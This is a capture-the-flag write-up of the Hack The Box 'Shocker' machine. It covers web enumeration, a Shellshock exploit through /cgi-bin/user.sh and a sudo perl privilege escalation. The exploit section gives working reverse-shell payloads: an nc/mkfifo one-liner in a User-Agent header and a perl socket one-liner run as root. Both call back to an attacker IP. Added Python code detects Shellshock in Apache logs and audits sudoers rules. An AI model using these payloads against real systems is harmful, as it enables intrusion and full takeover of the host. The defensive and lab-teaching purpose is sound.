Hack The Box shocker
shocker
tags: HTB
Easy
Procedure
enumeration
- nmap scan
```
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
```
```
GET / HTTP/1.1
Host: 10.10.10.56

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:44:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
ETag: "89-559ccac257884"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
```
No content was found.
- 80/tcp nikto
```
/opt/nikto/program/nikto.pl -h 10.10.10.56
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2021-03-20 21:19:52 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8862 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2021-03-20 21:53:04 (GMT9) (1992 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Nothing of particular significance.
```
dirb http://10.10.10.56

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 20 21:15:08 2021
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)

-----------------
END_TIME: Sat Mar 20 21:30:31 2021
DOWNLOADED: 4612 - FOUND: 3
```
Found the /cgi-bin/ directory.
```
$ python3 dirsearch.py -e "cgi,sh,py,txt,bin" -u http://10.10.10.56/cgi-bin/

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: cgi, sh, py, txt, bin | HTTP method: GET | Threads: 30 | Wordlist size: 10944

Error Log: /home/ubu/Downloads/dirsearch/logs/errors-21-03-04_00-49-49.log

Target: http://10.10.10.56/cgi-bin/

Output File: /home/ubu/Downloads/dirsearch/reports/10.10.10.56/cgi-bin_21-03-04_00-49-51.txt

[00:49:51] Starting:
[00:50:06] 403 -  310B - /cgi-bin/.htaccess.sample
[00:50:06] 403 -  308B - /cgi-bin/.htaccess.orig
[00:50:06] 403 -  305B - /cgi-bin/.ht_wsr.txt
[00:50:06] 403 -  308B - /cgi-bin/.htaccess.bak1
[00:50:06] 403 -  307B - /cgi-bin/.htaccessOLD2
[00:50:06] 403 -  306B - /cgi-bin/.htaccessOLD
[00:50:06] 403 -  309B - /cgi-bin/.htaccess_extra
[00:50:06] 403 -  306B - /cgi-bin/.htaccessBAK
[00:50:06] 403 -  308B - /cgi-bin/.htpasswd_test
[00:50:06] 403 -  308B - /cgi-bin/.htaccess.save
[00:50:06] 403 -  308B - /cgi-bin/.htaccess_orig
[00:50:06] 403 -  298B - /cgi-bin/.htm
[00:50:06] 403 -  304B - /cgi-bin/.htpasswds
[00:50:06] 403 -  305B - /cgi-bin/.httr-oauth
[00:50:07] 403 -  299B - /cgi-bin/.html
[00:50:07] 403 -  306B - /cgi-bin/.htaccess_sc
[00:52:37] 200 -  118B - /cgi-bin/user.sh
```
Found the user.sh file.
```
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:55:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/x-sh
Content-Length: 118

Content-Type: text/plain

Just an uptime test script
 19:55:58 up 11:41,  0 users,  load average: 0.00, 0.00, 0.00
```
Doesn't look like there's anything here...
- 80/tcp nikto again
```
$ nikto /opt/nikto/program/nikto.pl -h 10.10.10.56/cgi-bin/user.sh
```
Plenty of false positives show up, but the Shellshock vulnerability was found.
```
GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
Referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
User-Agent: () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;
Connection: close

HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 12:35:53 GMT
Server: Apache/2.4.18 (Ubuntu)
93e4r0-CVE-2014-6278: true
Connection: close
Content-Type: text/x-sh
Content-Length: 150

93e4r0-CVE-2014-6271: true
Content-Type: text/plain

Just an uptime test script
 08:35:53 up 21 min,  0 users,  load average: 0.00, 0.01, 0.00
```
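From the defender's side, the same probe shows up in the web server's access log as a bash function prelude (`() {`) sitting in the Referer or User-Agent field. The following scanner is an added example, not part of the original writeup: it parses Apache combined-format log lines and flags such values, distinguishing nikto's CVE-2014-6278 form from the original CVE-2014-6271 form. The log lines are constructed for the example, not taken from the box.

```python
import re
from typing import Dict, List

# Constructed Apache "combined" log lines (not from the box): line 1 mirrors the
# nikto probe above, line 2 is a normal request, line 3 mirrors an exploit attempt.
SAMPLE_LOG = r'''
10.10.15.3 - - [20/Mar/2021:12:35:53 +0000] "GET /cgi-bin/user.sh/ HTTP/1.1" 200 150 "() { _; } >_[$($())] { echo probe: true; }" "() { :; }; echo probe: true;echo;echo;"
10.10.15.3 - - [20/Mar/2021:12:36:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.15.3 - - [20/Mar/2021:12:40:01 +0000] "GET /cgi-bin/user.sh/ HTTP/1.1" 200 0 "-" "() { :;}; echo; /bin/bash -c 'id'"
'''

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The bash exported-function prelude abused by the CVE-2014-6271 family. Bash tolerates
# whitespace between "()" and "{", so the match is deliberately loose.
SHELLSHOCK = re.compile(r'\(\)\s*\{')
# nikto's CVE-2014-6278 test uses the ">_[$($())]" form; anything else is reported
# as the original CVE-2014-6271 form.
CVE_6278_MARKER = '>_[$($())]'

def classify(value: str) -> str:
    return 'CVE-2014-6278' if CVE_6278_MARKER in value else 'CVE-2014-6271'

def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per header value that carries a Shellshock prelude."""
    hits = []
    for line in text.strip().splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for header in ('referer', 'ua'):
            value = m.group(header)
            if SHELLSHOCK.search(value):
                hits.append({'ip': m.group('ip'), 'path': m.group('path'),
                             'header': header, 'style': classify(value), 'value': value})
    return hits

if __name__ == '__main__':
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ip']} {h['path']} {h['header']}={h['value']!r} [{h['style']}]")
```

Run against a real access log with `scan_log(open('/var/log/apache2/access.log').read())`; a hit on a `/cgi-bin/` path from a host still running an unpatched bash is the signal to act on.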
exploit
- Get a reverse shell using the Shellshock vulnerability. Start a listener on the local machine.
```
$ nc -lnvp 4445
```
Send a request that uses Shellshock.
Thanks to [OSCP](https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner).
```
GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.3 4445 >/tmp/f'
Connection: close
```
```
$ whoami
shelly
```
privilege escalation
```
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```
perl can be run as root without a password.
```
$ whoami
shelly
$ sudo perl -e 'use Socket;$i="10.10.15.3";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

```
# whoami
root
```
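The sudo rule above is the kind of thing an audit should catch before an attacker does: a NOPASSWD entry whose target is a bare interpreter is equivalent to a passwordless root shell. The check below is an added example (not from the writeup): it parses a sudoers-style text and reports such rules. The sudoers fragment and the interpreter list are constructed assumptions for the example.

```python
import re
from typing import List, Tuple

# Interpreters and editors that hand over an unrestricted root shell when sudo-able
# (assumption: an illustrative list, not an exhaustive one).
INTERPRETERS = {'perl', 'python', 'python3', 'ruby', 'bash', 'sh', 'vi', 'vim', 'awk'}

# Constructed sudoers fragment (not the box's real file); the shelly line mirrors
# the sudo -l output above.
SAMPLE_SUDOERS = """
# User privilege specification
root    ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
deploy  ALL=(root) NOPASSWD: /usr/sbin/service nginx restart
ops     ALL=(ALL) /usr/bin/apt-get
"""

# user  host=(runas) [TAG: ...] command[, command...]
RULE = re.compile(
    r'^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$'
)

def find_nopasswd_interpreters(text: str) -> List[Tuple[str, str]]:
    """Return (user, binary) pairs for NOPASSWD rules whose command is a bare interpreter."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = RULE.match(line)
        if not m or 'NOPASSWD' not in m.group('tags'):
            continue
        for cmd in m.group('cmds').split(','):
            parts = cmd.split()
            if not parts:
                continue
            binary = parts[0]
            # Compare on the basename so /usr/bin/perl and /usr/local/bin/perl both match.
            if binary.rsplit('/', 1)[-1] in INTERPRETERS:
                findings.append((m.group('user'), binary))
    return findings

if __name__ == '__main__':
    for user, binary in find_nopasswd_interpreters(SAMPLE_SUDOERS):
        print(f'{user} can run {binary} as root without a password')
```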
Closing
- Thanks to the handy tools.